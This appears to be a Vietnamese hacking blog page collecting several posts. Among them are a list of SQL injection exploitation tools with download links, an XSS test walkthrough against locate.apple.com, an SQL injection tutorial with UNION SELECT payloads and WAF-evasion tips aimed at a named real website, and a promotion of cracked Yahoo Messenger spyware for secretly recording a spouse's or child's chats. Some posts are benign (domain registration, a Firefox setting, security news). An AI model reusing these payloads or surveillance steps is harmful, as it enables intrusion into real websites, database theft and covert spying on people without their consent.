Trang

Hướng tẫn tạo 1 con bot đơn giản

Download: http://www.mediafire.com/?dtdxmydmrht
Password: sinhvienit.net

Xem Thêm

 

Bypass SQLi VBB ( ALL Version )


Xem Thêm

 

Top15 phần mềm scan bug sql

Share cho newbie -pro chém nhẹ nha!


SQLIer - SQLIer takes a vulnerable url and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.

Code:
http://bcable.net/project.php?sqlier


SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.

Code:
http://www.reversing.org/node/view/11


SQL Injection Brute-forcer - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.

Code:
http://www.open-labs.org/sqlibf19beta1.tar.gz


SQLBrute - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.

Code:
http://www.justinclarke.com/security/sqlbrute.py


download ActivePerl dành cho win:

http://aspn.activestate.com/ASPN/Downloads/ActivePerl/

BobCat - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.

Code:
http://www.northern-monkee.co.uk/pub/bobcat.html


SQLMap - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.

Code:
http://sqlmap.sourceforge.net/


Absinthe - Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.

Code:
http://www.0x90.org/releases/absinthe/download.php


SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.

Code:
http://sqltool.itdefence.ru/indexeng.html


SQID - SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.

Code:
http://sqid.rubyforge.org/


Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.

Code:
http://www.unsec.net/download/bsqlbf.pl

---------Nguồn GUG-------------

Xem Thêm

 

TUT reg tên miền tiếng việt

Tut reg tên miền tiếng việt miễn phí

Bước 1 vào http://vnnic.vn/tenmientiengviet/ tra cứu xem tên miền có sẵng chưa nhé
Ví dụ tên miền của mình reg là “sinhtửhội.vn” sau đó bấm nút tra cứu, nếu báo chưa ai đăng ký là mình có thể reg đc.


Bước 2: Vào http://dangky.tenmientiengviet.vn/jsp/login.jsp hoặc bấm nút Đăn ký TMTV sẽ hiện ra như sau:




Bấm vào nút tạo tài khoản mới nhá:
Sau đó điền info đầy đủ của mình vào:
Postcode thì vào http://postcode.vnpost.vn/services/search.aspx lấy nhá
Ví dụ info của mình là:
Còn Ngày cấp CMND: thì điền ngày 01/01/ năm mình làm CMND ví dụ 01/01/2010
Nơi cấp thì ghi thị trấn mình làm cho nhanh ví dụ Phú Long
Nhập info đoạn đầu rồi bấm Lấy từ thông tin chủ thể cho nó lẹ nhá


Nếu nhập info chính xác thì sẽ hiện thông báo như sau:




Bấm OK lun




Rồi bấm vào đăng ký tên miền để đăng ký nhá:




Nếu báo lỗi: Số lượng ký tự của tên miền đã nhập nhiều hơn số lượng ký tự tối đa của một từ đơn trong tiếng Việt thì reg tên miền # NHÁ.


Bấm tiếp tục đăng ký lun









Bấm nút tiếp tục luôn
Rồi bấm Tôi đồng ý chờ 48 giờ







Là thành công
Vài ngày sau bạn vào
Đăng nhập thử nếu trạng thái: Đã được xác nhận QSD là xong nhé.
Sau khí có QSD bạn sẽ được vào http://dichvu.tenmientiengviet.vn/ để trỏ DNS hoặc tạo web có sẵng
với tên truy cập và mật khẩu của bạn đã tạo trước đó.
Ví dụ:
Mỗi lần trỏ DNS khổ lắm, toàn chờ tụi nó làm cho mình,chả auto tý nào cả.


Xem Thêm

 

Share bộ giáo trình CEH Full v7 - Tiếng Việt

I/ Giới thiệu:
Bộ giáo trình tài liệu về an ninh mạng được dịch lại hoàn toàn bằng tiếng việt từ bộ tiếng anh gốc + video demo cho mỗi chương.
Bộ giáo trình này chỉ nêu những kiến thức và những kỷ thuật cơ bản nhất, còn muốn chuyên sâu thì các bạn có thể tự tìm hiểu thêm nếu đã nắm vững kiến thức nền.
Một số hình ảnh ví dụ tham khảo về bộ giáo trình
[Hình: 1-1.jpg]
Phần demo
[Hình: 3.jpg]
Phần lý thuyết
[Hình: 2.jpg]
II/ Link download
Bấm vào đây để download
pass để download: longbaoitc

Xem Thêm

 

TuT Java Applet JAX-WS!

***khuyến cáo: xem ở chế độ 720HD rõ như ban ngày Smile)

Xem Thêm

 

[Tutorial] Tut check XSS locate.apple.com theo phương thức Post

Victim: locate.apple.com

Công cụ: Live HTTP để bắt các request
Bước 1: Vào trang chủ:locate.apple.com



Click chuột vào tab Services, Bật Live HTTP sau đó bắt request


Bước 2:Bật Live HTTP chương trình như sau



Bước 3:Các bạn nhìn thấy request Post trong hình rồi bây giờ click tab header->Để ý vào mục Post-> sau đo click vào Replay để request lại



Bước 4:Để ý trong nội dung Send Post content?. Mình sẽ thêm Script XSS ở đây mình thêm script sau
<script>alert('Check by kakavn_85')</script>  sau vị trí location=



Sai đó ấn nút replay đợi 1 lúc sẽ hiện ra kết quả như sau



End Tut: kakavn_85

Xem Thêm

 

SQL Injection - Useful Functions - Tutorial

Here are some useful function that you can use to speed up your injection and/or evade some WAFs.

If group_concat() or concat() are not available (or you can't bypass a WAF that filters out these functions) you can try and use this:


Mã:
http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,lcase(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
or

Mã:
http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,ucase(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
lcase() returns the lowercase value of the database/table/column names
ucase() returns the uppercase value of the database/table/column names

*Note: In some situations you'll have to use the limit 0,1 function along with these functions to get all of the database/table/column names.


Another useful thing is the max() and min() function. These functions will return the name of the first or last table/column name.

For example:

Mã:
http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,min(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

or

Mã:
http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,max(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--


The next useful function is count(). When we're limited to the limit 0,1 function in most cases we'll have to manually increment the number in the limit function. Most sites contain the table "user" or something similar witch in most cases is located at the end of the table count (because tables/columns are alphabetically sorted). We can simply use the count() function to find out the number of tables/columns and use that number in the limit function.

For example: We first find out the number of tables:

Mã:
http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,count(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
Now we see the number 10 but that is not the real table count. The reason behind this is that the function count() counts 0,1,2,3,4,5,6,7,8,9 witch is 10. So the number that we use in the limit function is 9.
We proceede then with the concat() function:

Mã:
http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,concat(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() limit 9,1--

Xem Thêm

 

IMMonitor Yahoo Messenger Spy v2.2.9.(Full)

IMMonitor Yahoo Messenger Spy cho phép bạn theo dõi, khoá lại hoặc ghi lại các đoạn đối thoại chat trên Yahoo Messenger từ xa. Nếu con cái bạn (hay vợ, chồng bạn!) đang dành quá nhiều thời gian để chat trên Yahoo Messenger? hay bạn nghi ngờ họ dính líu tới những cuộc thoại nguy hiểm, Nếu vậy thì IMMonitor Yahoo Messenger Spy là lựa chọn tốt nhất cho bất kì ai cần thông tin về chuyện này, thật nhanh chóng và bí mật. Nó dễ sử dụng và không cần phải cài đặt trên máy đích cần theo dõi. Sẽ không ai biết rằng các cuộc đối thoại trên Yahoo Messenger của họ đang bị khoá hay ghi lại và nó sẽ không bao giờ ngừng hoạt động trừ phi bạn đóng nó lại.

Các tính năng:


  • Ghi lại và lưu giữ các cuộc đối thoại qua Yahoo Messenger trên ở bất cứ máy tính nào trong mạng lưới.
  • Ghi lại hoặc khoá các cuộc đối thoại trên qua Yahoo Messenger.
  • Xuất các tin nhắn bị chặn ra file HTML.
  • Tự động gửi báo cáo về cuộc chat qua email để xem từ xa.
  • Bảo vệ bằng mật khẩu và phím nóng.
  • Hoạt động ở chế độ lén lút.
  • Bắt đầu ghi lại ngay từ khi mới khởi động chương trình.
  • Sử dụng an toàn, dễ dàng và mạnh mẽ

LINK DOWNLOAD: http://www.mediafire.com/?qnbq246tbbq40a7

ANH CHẠY FILE CÀI ĐẶT
Giải nén, chạy file yahoochecker cài đặt bình thường. cài xong copy file patch vào thư mục cài đặt và chạy nó

XONG,

MỞ CHƯƠNG TRÌNH LÊN CHỌN CONFIG LÀM NHƯ HÌNH SAU
Khởi động lại máy là xong.

Xem Thêm

 

Facebook sửa lỗi bypass Password

Facebook vừa sửa lỗ hổng bảo mật vào cuối tuần qua và cho rằng nó có thể bị khai thác và có thể có trên 1 triệu tài khoản sẽ bị đăng nhập trái phép nếu không xác thực kịp thời


Trong tuần này Facebook đã vô hiệu hóa lỗ hổng mà có thể cho phép các hacker truy cập vào tài khoản người dùng mà không cần mật khẩu.
Các Hacker đã phát hiện ra lỗ hổng này của Facebook và được đăng lên vào thứ 6 vừa qua.
Theo tin tức của các Hacker. Các lỗ hổng được tập trung vào các Email từ mạng xã hội có chưa các liên kết độc hại. Khi người dùng Click vào link đó và các hacker có thể đăng nhập vào tài khoản email mà không cần dùng password hay qua một bước xác thực nào cả. Theo các thông kê tìm kiếm trên google thì có khả năng 1,3 triệu người sử dụng có khả năng dính lỗ hổng này.
Cũng như các liên kết mà có thể phơi bày các tài khoản Facebook để đăng nhập trái phép, truy vấn tìm kiếm cũng cho thấy địa chỉ e-mail liên kết với các tài khoản.Các truy vấn tìm kiếm đã tìm thấy các liên kết – chỉ là tạm thời và sẽ hết hiệu lực khi người dùng dự định nhấp vào chúng – kể từ đó đã bị vô hiệu hóa bởi Google và không hiển thị bất kỳ kết quả nào.
Kỹ sư Matt Jones của Facebook nói trên trang Hacker News  rằng Facebook không chia sẻ các liên kết. “Chúng tôi chỉ gửi các URL đến địa chỉ e-mail của chủ tài khoản để dễ dàng sử dụng và không bao giờ làm cho họ công bố công khai Thậm chí sau đó, chúng tôi đặt bảo vệ tại chỗ để làm giảm khả năng mà bất cứ ai khác có thể nhấp chuột vào các tài khoản.”
“Đối với một công cụ tìm kiếm để đi qua những liên kết này, nội dung của e-mail sẽ cần phải đã được đăng trực tuyến (ví dụ như thông qua các trang web email throwaway, như ai đó chỉ ra – hoặc những người có địa chỉ e-mail đi để gửi email danh sách với trực tuyến lưu trữ), ” ông nói thêm.
Hệ thống bảo mật của Facebook cũng chạy “kiểm tra bổ sung để đảm bảo rằng nó trông giống như chủ sở hữu tài khoản của những người đăng nhập vào”, theo Jones.
Hầu hết các liên kết trong các kết quả tìm kiếm đã có thể đã hết hạn, và Kể từ đó, Facebook đã vô hiệu hóa các tính năng cho thời gian, các kỹ sư cho biết.
“Bất kể, do một số những liên kết này bị tiết lộ, chúng tôi đã bật tính năng cho đến khi chúng tôi tốt hơn có thể bảo đảm an toàn cho người sử dụng e-mail nội dung hiển thị công khai. Chúng tôi cũng đảm bảo tài khoản của bất cứ ai đăng nhập thông qua hệ thống kiểm tra độ an toàn của facebook. “

Xem Thêm

 

Thay đổi agent mặc định của Firefox

1. Open " C:\Documents and Settings\username\Application Data\Mozilla\Firefox\Profiles\3vfugy1g.default\prefs.js "
2. Add the following line

Code:
user_pref(“general.useragent.override”, “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)“);
3. save and close prefs.js.
4. restart your Firefox browser

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương